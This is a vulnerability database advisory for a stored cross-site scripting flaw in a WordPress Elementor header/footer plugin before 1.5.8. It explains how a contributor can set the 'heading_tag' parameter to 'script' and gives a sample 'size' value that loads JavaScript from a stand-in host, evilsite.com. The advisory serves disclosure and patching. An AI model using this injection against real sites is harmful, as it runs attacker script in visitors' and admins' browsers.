Lucene search

K
wpvulndbRamuel GallWPVDB-ID:A9412FED-AED3-4931-A504-1A86F876892E
HistoryApr 13, 2021 - 12:00 a.m.

Elementor - Header, Footer & Blocks Template < 1.5.8 - Contributor+ Stored XSS

2021-04-1300:00:00
Ramuel Gall
wpscan.com
13

0.001 Low

EPSS

Percentile

19.5%

The “Elementor – Header, Footer & Blocks Template” WordPress Plugin before 1.5.8 has two widgets that are vulnerable to stored Cross-Site Scripting (XSS) by lower-privileged users such as contributors, all via a similar method. The “Page Title” widget accepts a “heading_tag” parameter. Although the element control lists a fixed set of possible html tags, it is possible to send a ‘save_builder’ request with the “heading_tag” set to “script”, and the actual page title set to JavaScript. This JavaScript will then be executed when the saved page is viewed or previewed. Alternatively, the “heading tag” can be set to “script” and the “size” parameter can be set to a remotely sourced script, e.g. “medium" src="https://evilsite.com/alertscript.js”. The remotely hosted JavaScript will then be executed when the saved page is viewed or previewed. The “Site Title” widget can likewise be exploited by setting the “heading_tag” parameter to “script” and the “size” parameter to a remotely sourced script - most attackers would not be able to manipulate the actual site title itself, but this might also be exploitable in a similar way to the page title. These vulnerabilities are nearly identical to the vulnerabilities we have recently disclosed in the main Elementor plugin: https://www.wordfence.com/blog/2021/03/cross-site-scripting-vulnerabilities-in-elementor-impact-over-7-million-sites/

CPENameOperatorVersion
header-footer-elementorlt1.5.8

0.001 Low

EPSS

Percentile

19.5%

Related for WPVDB-ID:A9412FED-AED3-4931-A504-1A86F876892E